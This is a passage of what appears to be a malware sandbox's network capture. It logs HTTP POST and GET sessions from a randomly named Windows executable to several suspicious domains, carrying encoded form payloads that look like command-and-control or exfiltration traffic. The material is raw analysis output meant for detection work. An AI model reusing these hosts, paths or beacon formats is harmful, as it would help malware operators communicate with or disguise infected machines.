                                                                                                                            Data Ascii: mFptYb=grjygjBzNeYAZ0FSrROyJdXHLWlyuANHpaZlnivgkT2ODMHF0LlF3Za3Im8AjhMoTFMOCy3bx7dXq7dYtmQLmuGeT7gQTBklvhoRRhX7BQkTGTPKESbOgmVTP9+OxhsGnrAuiBE7SNHk5c9/TZkz3DoIWza3cfs+nF0OS5qNJ9pZJm0eks0Y/D1IXx73B4vUh5HtG6u5aVDizpNMAT97VgBy80JN9RmQ+UAEs3hYNi8IHEGVsw654d0neS39aJKX8dpsxc6gD4BRdgz6ahz2kXZIzKmNAdx33deauKCp8+Fj3W/U+4JoDC9MzyiyxX8ab7eDA8cfMBRDvdZAWptCRsmKaDVZLEhBroTaZKc9QtBNwRmPZQzOyFNgcnZP8CBLvSJT1AELcBothgV+ZiApCIirgE+X6qFCM7X4wG58kscPzsAzpMKx//pnQfNOgQC63Ruo3k0uCPxflH++LySNkClV2/7aUpCLYbcAo9TsCswqUF5c7PjmsJx8o16PGEgaAlSselQnfdwRJDBBD4orrMwDnxZ3S6p4F7KsiA+5ZOB5Y+doDzj6Z8CDXq2hJKPLl26cF+Cyzq4vICFFAcKaT+kpDuTL+X2A7/3Ks/KWdgRDwuApM6nWRZnhZBSkSz9fXrNx5fBOkGhJqT7UF01lp2gcQZAYEpt8nx+WNKzDkakbWJ3XjiqVt57Gcn/ZsZUe9+OyjkZeL6nxrXfna3yz4dNzNP+s+gRr3DRYBKAWg2UDZa9e+1dMYlusYcaBHbYOkD0oizQ1+EKdC7lTF6SUj0QIdSq8i0lfkjRiRDbWw6Np+HgNH+fz010NnyIJ8sGO2CUk0Ebf1+qRjFRSdKli+6BPi6IGYaXNx1fNnZx3lsJs0mFYVwdQb8Zl/arsAtFXkPR1ZVpkqdSRWenGzDvE6hKNDLFHimooNVWls+c/g9yCxu/nM0Lgkb6aSRb1LwDJdfBBX647F4Lb35NipsRbkHHlfxiKHcIAHx6XuqrRvV6XA [TRUNCATED]
                                                                                                                            Nov 7, 2024 10:53:00.369112968 CET1758OUTData Raw: 6a 69 4a 41 57 75 2b 30 78 64 35 4a 6b 38 43 4f 76 77 6c 42 4f 69 56 59 55 59 65 56 58 75 4a 38 52 44 46 77 67 4d 78 56 61 7a 51 6d 4b 4a 62 75 49 6b 63 66 50 47 54 73 6f 73 66 4c 46 32 39 51 43 33 4f 45 69 6d 4a 75 6e 4e 74 43 5a 73 53 79 74 4f
                                                                                                                            Data Ascii: jiJAWu+0xd5Jk8COvwlBOiVYUYeVXuJ8RDFwgMxVazQmKJbuIkcfPGTsosfLF29QC3OEimJunNtCZsSytOP96S0ecPrcbXlM5d6kAGo5RBPMpqp2jF6XHGRWu1kTUSGbS8Pj63PFnvR6TzT4uDSE3q5OZTltH2Rrn2uoPmdt9dQtnS2KiGCoOurNTkM+MNJCdMIkRAMGXc3GMtcXBY051QDQCb3EmClIUSs+QpO0MJxcOLDoaDA
                                                                                                                            Nov 7, 2024 10:53:01.204752922 CET1236INHTTP/1.1 404 Not Found
                                                                                                                            Date: Thu, 07 Nov 2024 09:53:01 GMT
                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                            Server: ghs
                                                                                                                            Content-Length: 1566
                                                                                                                            X-XSS-Protection: 0
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                            Nov 7, 2024 10:53:01.204865932 CET537INData Raw: 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d
                                                                                                                            Data Ascii: oglelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 1


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            49192.168.2.2249210142.250.185.11580652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:53:02.904683113 CET535OUTGET /m6se/?Vta=nFypuDtholF&mFptYb=tpLSjTwEMN9ZKyp9qVSTFKrjCn9ygWFWt49InxX861XvXeuMycl5+MP/OGAzrS8FX3YfTT6PzpVF+4Zez3QIzOzSaqsrWwxbsC4SLAepSA8UeSOwbSX7uDAGPo/m HTTP/1.1
                                                                                                                            Host: www.digitaladpro.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Nov 7, 2024 10:53:03.748545885 CET1236INHTTP/1.1 404 Not Found
                                                                                                                            Date: Thu, 07 Nov 2024 09:53:03 GMT
                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                            Server: ghs
                                                                                                                            Content-Length: 1718
                                                                                                                            X-XSS-Protection: 0
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                            Nov 7, 2024 10:53:03.749058962 CET689INData Raw: 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d
                                                                                                                            Data Ascii: oglelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 1


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            50192.168.2.22492113.33.130.19080652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:53:08.913045883 CET2472OUTPOST /y0sc/ HTTP/1.1
                                                                                                                            Host: www.loginov.enterprises
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.loginov.enterprises
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 2163
                                                                                                                            Referer: http://www.loginov.enterprises/y0sc/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 67 4c 31 4b 2f 7a 61 61 2f 56 48 7a 69 70 44 6a 44 73 39 64 4c 4d 43 4e 43 6d 79 2f 4e 75 49 75 34 49 79 37 56 37 59 66 76 4b 31 54 36 7a 6a 47 34 31 52 4f 55 65 65 66 37 4c 30 65 5a 56 79 70 31 62 4b 4c 45 36 52 64 35 58 2b 79 4a 74 4f 59 36 43 4a 36 57 45 4d 67 57 78 74 4b 72 51 4b 39 69 66 42 52 77 72 79 4a 59 65 49 77 63 45 68 71 34 50 35 6b 45 33 34 36 53 52 75 2b 55 7a 74 35 6a 6c 34 45 6e 73 4f 58 41 77 4f 43 78 75 73 2f 59 4e 6d 78 59 35 49 4d 66 55 68 42 33 68 68 34 55 76 73 49 57 76 2f 46 61 55 38 30 71 6f 4f 74 71 33 6c 72 6c 6c 4b 39 4d 69 63 42 61 4e 69 71 66 55 67 49 63 53 45 54 32 46 49 53 4e 55 33 61 4c 65 65 6d 69 59 75 45 57 36 6b 45 5a 46 32 6f 55 45 31 4a 61 47 59 30 4a 51 33 2b 63 4d 4c 59 35 2f 31 6f 36 33 47 4d 2f 51 61 55 30 6b 6b 56 56 66 66 44 69 42 79 5a 31 66 7a 34 33 39 47 33 74 30 65 4f 53 66 75 4f 6a 58 64 2b 4e 61 70 56 35 44 6e 5a 68 65 56 77 30 67 34 5a 6a 57 68 71 35 63 49 35 35 75 78 68 6e 6a 49 72 42 42 64 78 64 6a 53 4f 68 54 47 36 4a 53 47 [TRUNCATED]
                                                                                                                            Data Ascii: mFptYb=gL1K/zaa/VHzipDjDs9dLMCNCmy/NuIu4Iy7V7YfvK1T6zjG41ROUeef7L0eZVyp1bKLE6Rd5X+yJtOY6CJ6WEMgWxtKrQK9ifBRwryJYeIwcEhq4P5kE346SRu+Uzt5jl4EnsOXAwOCxus/YNmxY5IMfUhB3hh4UvsIWv/FaU80qoOtq3lrllK9MicBaNiqfUgIcSET2FISNU3aLeemiYuEW6kEZF2oUE1JaGY0JQ3+cMLY5/1o63GM/QaU0kkVVffDiByZ1fz439G3t0eOSfuOjXd+NapV5DnZheVw0g4ZjWhq5cI55uxhnjIrBBdxdjSOhTG6JSGhOR3aT6gYek2UCrm9MeA77wWFRvaQDQLLeTvCVDT7DVVpUSttZUVk4HEn2NeADD2z3kxF8a74TN7I065P9Tv2o/TV6KWCrP8HkFNXIUH/uzBeYd+X/jbo8pNkniLnf1nGKrwqUDewWwRVul1gy8klS0c0OLiGohqhhkFflaOU0lK+9laggYUPTAzoPPlf+euz7UmQB1vThfliEUo0bxkF2V4GcCf/6jc1rl7FrdTKjX/hFhgFmc0S2KToNxCfBbZBqO/w+QVsRuNItJu8a0x9CUi8hfizocCXCvRntAaK/Lrgm2YcEU4I7Y0ecWOfx7SVIzw8aFZsy4milAYKcrYVcmsxG4VPYNwRL0ss9Ov+W10ZqPCSdxfb5XkSbupIlIpZs2O2123AIbawgv7rQRmKrTBbeSE9BdiLpsfoltMbGKz6kyHw9Cfll/VFhWirtHDE9qzTxWxHcozgFLNKJme3KITO6Vo6Q+OS2q+V9pKGAU+D8kpVJ67l647sW4JHgiHZfr0VSE2G/TtqrL1LvRnwH2b8gxP/J1HG4TyweXyZFXKGBVId1BXDulCYDvtC6C+VFNThlG4ImGFBTBer35IRDdpq2n7N9q+fZZo0jk75a0kA8aZ/r1mw1rYdspwDxmlDtLRgKBqNLgZh/V7s53/4G3jdQoN3Tf/Sd [TRUNCATED]
                                                                                                                            Nov 7, 2024 10:53:08.924796104 CET300OUTData Raw: 41 4e 77 48 41 65 6e 65 37 6f 39 4c 5a 74 46 4c 45 70 33 72 32 72 4a 32 2b 56 4c 73 58 57 2f 63 38 58 64 68 6e 57 4b 49 4c 39 33 55 4b 6b 5a 46 55 52 61 6c 33 7a 2f 48 67 30 36 32 2f 2b 58 55 52 58 33 30 6a 45 4b 2b 65 4f 44 4c 57 75 75 54 35 6a
                                                                                                                            Data Ascii: ANwHAene7o9LZtFLEp3r2rJ2+VLsXW/c8XdhnWKIL93UKkZFURal3z/Hg062/+XURX30jEK+eODLWuuT5jmsW+qjFba8/CeNjdPGLBXb+IJic2/LTbuNPiSh3aiFCHtXReBrOFQ4JzQX3V3I+/zcw+XJ4SQxNopC86KbE83AikbcfaT1GQpZdEDDGHvoTpnJckbno+uNJKIEf+3pkXd6rzzbnCST9ez9N7Dk7+3VuFIDeGTmaEV


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            51192.168.2.22492123.33.130.19080652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:53:11.472779989 CET811OUTPOST /y0sc/ HTTP/1.1
                                                                                                                            Host: www.loginov.enterprises
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.loginov.enterprises
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 203
                                                                                                                            Referer: http://www.loginov.enterprises/y0sc/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 67 4c 31 4b 2f 7a 61 61 2f 56 48 7a 69 70 2f 6a 5a 5a 42 64 61 63 43 4e 48 6d 79 2f 45 4f 49 67 34 49 32 73 56 35 30 50 6f 38 52 54 37 69 54 47 34 6d 70 4f 56 65 65 59 77 72 30 61 54 31 79 77 31 62 4b 74 45 2b 5a 64 35 58 71 79 4a 49 4b 59 72 58 6c 37 4c 6b 4d 69 44 68 74 48 72 51 47 65 69 66 4e 42 77 76 4f 4a 59 5a 73 77 54 6b 52 71 6f 39 42 6b 53 58 34 38 61 78 75 74 55 7a 70 57 6a 6c 70 6f 6e 74 79 58 41 42 43 43 32 38 30 2f 53 38 6d 78 52 5a 49 4a 46 45 68 53 32 79 4d 58 53 75 38 45 53 4f 44 36 54 6e 67 6d 33 37 6d 6a 67 6c 52 5a 7a 6b 79 56 42 6e 4e 39 5a 76 37 57 4e 51 3d 3d
                                                                                                                            Data Ascii: mFptYb=gL1K/zaa/VHzip/jZZBdacCNHmy/EOIg4I2sV50Po8RT7iTG4mpOVeeYwr0aT1yw1bKtE+Zd5XqyJIKYrXl7LkMiDhtHrQGeifNBwvOJYZswTkRqo9BkSX48axutUzpWjlpontyXABCC280/S8mxRZIJFEhS2yMXSu8ESOD6Tngm37mjglRZzkyVBnN9Zv7WNQ==


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            52192.168.2.22492133.33.130.19080652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:53:14.014554977 CET2472OUTPOST /y0sc/ HTTP/1.1
                                                                                                                            Host: www.loginov.enterprises
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.loginov.enterprises
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 3627
                                                                                                                            Referer: http://www.loginov.enterprises/y0sc/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 67 4c 31 4b 2f 7a 61 61 2f 56 48 7a 69 49 76 6a 4b 4b 70 64 4b 4d 43 4f 61 57 79 2f 4e 75 49 73 34 49 79 73 56 37 59 66 76 4f 64 54 36 78 62 47 34 46 52 4f 54 65 65 59 79 72 30 65 5a 56 79 6d 31 66 69 62 45 36 56 6e 35 55 47 79 4a 70 61 59 36 42 52 36 66 6b 4d 67 55 78 74 45 72 51 47 48 69 66 64 4e 77 76 43 76 59 5a 6b 77 54 57 4a 71 35 39 42 6c 64 33 34 38 61 78 75 62 55 7a 6f 48 6a 6c 78 5a 6e 73 62 53 41 79 4b 43 32 65 73 2f 54 64 6d 77 41 4a 49 4e 4a 6b 68 48 33 68 74 42 55 76 73 4d 57 75 62 76 61 55 67 30 34 4b 32 74 71 30 64 6f 35 46 4b 69 43 43 63 42 55 74 69 6f 66 55 68 58 63 53 45 54 32 42 49 53 4c 55 33 61 4c 66 65 6c 2f 6f 75 45 65 61 6b 4e 64 45 4b 37 55 43 5a 6e 61 46 51 43 4b 6a 37 2b 64 4f 54 59 75 2f 31 6f 71 58 48 46 2f 51 61 5a 74 30 6b 4a 56 66 48 31 69 42 69 4a 31 66 7a 34 33 2b 4f 33 37 32 32 4f 43 2f 75 4f 2b 48 64 37 57 71 70 57 35 43 53 36 68 65 52 77 30 68 51 5a 6a 6b 4a 71 79 2b 51 2b 79 2b 78 69 74 44 49 70 46 42 63 72 64 69 2b 30 68 54 4f 41 4a 53 32 [TRUNCATED]
                                                                                                                            Data Ascii: mFptYb=gL1K/zaa/VHziIvjKKpdKMCOaWy/NuIs4IysV7YfvOdT6xbG4FROTeeYyr0eZVym1fibE6Vn5UGyJpaY6BR6fkMgUxtErQGHifdNwvCvYZkwTWJq59Bld348axubUzoHjlxZnsbSAyKC2es/TdmwAJINJkhH3htBUvsMWubvaUg04K2tq0do5FKiCCcBUtiofUhXcSET2BISLU3aLfel/ouEeakNdEK7UCZnaFQCKj7+dOTYu/1oqXHF/QaZt0kJVfH1iBiJ1fz43+O3722OC/uO+Hd7WqpW5CS6heRw0hQZjkJqy+Q+y+xitDIpFBcrdi+0hTOAJS2hOTfaVbgYfU2XYbm5dON07wO/RvPlDWTLYCvCEBL8GlUDfCsidUVG4HBw2M+ACyuz2kRF4tX/R97P/a5Yzzvio+zN6OKSr+MHk1NXMyT4gDBXW9+F1DbA8pNWnjrofgjGKpkqUWywWwRSrl1irspGS0AwOLuWonOhh3dflbOUgVK+nVan5IUrTA3ePPNh/u6z63OQH33Tj/lkCUpTfxlv2WAGcGGn6no1oHTFq5nKr3/fDRgKmc1h2KnkNxSlBZ9BqLTw4UJsOONFhpuwXUxWCUaWhevWoYeXBPxngRaK5rruk2YcO04A7Y9hcXihx+uVIn08OVZv/YmhnAYVKrZScm8xG4ZPYOwRLHEs3Z7+el0f1fCEIBC05X1tbsFYlO5ZsnO2y0vHQLa2xf7xURmirTBHeTctBsCLpeXojJQcNKz5qSHZyieUl/F7hWGBuwTE9rjTxlZHbYzgFLNFJme7KIf86QUDQ+OSkvSV9byGI0+8+koREa7F65PGW8kigibZf6UVSE2ByDtpir1KvRaiH2begxD/JAHG4B6wZxmZC3KGMFIcsxXCulCIDtJS6D+VE9zhgAMJuWFAVBfyiJNPDd0/2jjN8aCfbLA0gU75T0kD26Y91Fi01rF2stsTxX1DjY5gRG+OQAZg7V7u53z1G3rFQo1dTcPSc [TRUNCATED]
                                                                                                                            Nov 7, 2024 10:53:14.025651932 CET1764OUTData Raw: 41 4e 78 51 41 66 6e 30 37 73 74 4c 5a 73 6c 4c 46 4b 50 72 32 4c 4a 70 78 31 4c 6c 58 57 2f 61 38 58 46 32 6e 55 65 69 4c 36 50 55 4d 32 68 46 54 69 79 6c 2b 6a 2f 5a 67 30 37 35 79 65 62 62 52 58 33 53 6a 45 4f 2b 65 4f 54 4c 57 70 36 54 2b 54
                                                                                                                            Data Ascii: ANxQAfn07stLZslLFKPr2LJpx1LlXW/a8XF2nUeiL6PUM2hFTiyl+j/Zg075yebbRX3SjEO+eOTLWp6T+TmzbuqifLa/2ieRjdPSLEHl+IdibkHLTpWNPSSn+6iWInoIReFvOHIOKBYXx3PI1tbc0eXMmiQGNol68+utE9n6i2vceqT1NyBaM0DFBHvlTpnxckTjo/zAJOEEf8vp2Xd5sDzBkCTO9e3QN7LK7+nVuAYDMWDmTkV


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            53192.168.2.22492143.33.130.19080652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:53:16.552550077 CET537OUTGET /y0sc/?mFptYb=tJdq8Dqw4hWr1P6qEoxHD8OlFm+HKuZ69MCgVLcAx6ZVjDjmpjdFVs/kycs0W1S/0p2sAvBc0lWbLbeb6h4QLTxDUgZUmiCBrM9D9onPOIUOQ3sXksUDVUExaBXH&Vta=nFypuDtholF HTTP/1.1
                                                                                                                            Host: www.loginov.enterprises
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Nov 7, 2024 10:53:17.170526981 CET402INHTTP/1.1 200 OK
                                                                                                                            Server: openresty
                                                                                                                            Date: Thu, 07 Nov 2024 09:53:17 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 262
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6d 46 70 74 59 62 3d 74 4a 64 71 38 44 71 77 34 68 57 72 31 50 36 71 45 6f 78 48 44 38 4f 6c 46 6d 2b 48 4b 75 5a 36 39 4d 43 67 56 4c 63 41 78 36 5a 56 6a 44 6a 6d 70 6a 64 46 56 73 2f 6b 79 63 73 30 57 31 53 2f 30 70 32 73 41 76 42 63 30 6c 57 62 4c 62 65 62 36 68 34 51 4c 54 78 44 55 67 5a 55 6d 69 43 42 72 4d 39 44 39 6f 6e 50 4f 49 55 4f 51 33 73 58 6b 73 55 44 56 55 45 78 61 42 58 48 26 56 74 61 3d 6e 46 79 70 75 44 74 68 6f 6c 46 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?mFptYb=tJdq8Dqw4hWr1P6qEoxHD8OlFm+HKuZ69MCgVLcAx6ZVjDjmpjdFVs/kycs0W1S/0p2sAvBc0lWbLbeb6h4QLTxDUgZUmiCBrM9D9onPOIUOQ3sXksUDVUExaBXH&Vta=nFypuDtholF"}</script></head></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            54192.168.2.2249215154.23.184.9580652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:53:22.203635931 CET2472OUTPOST /1bs4/ HTTP/1.1
                                                                                                                            Host: www.wcp95.top
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.wcp95.top
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 2163
                                                                                                                            Referer: http://www.wcp95.top/1bs4/
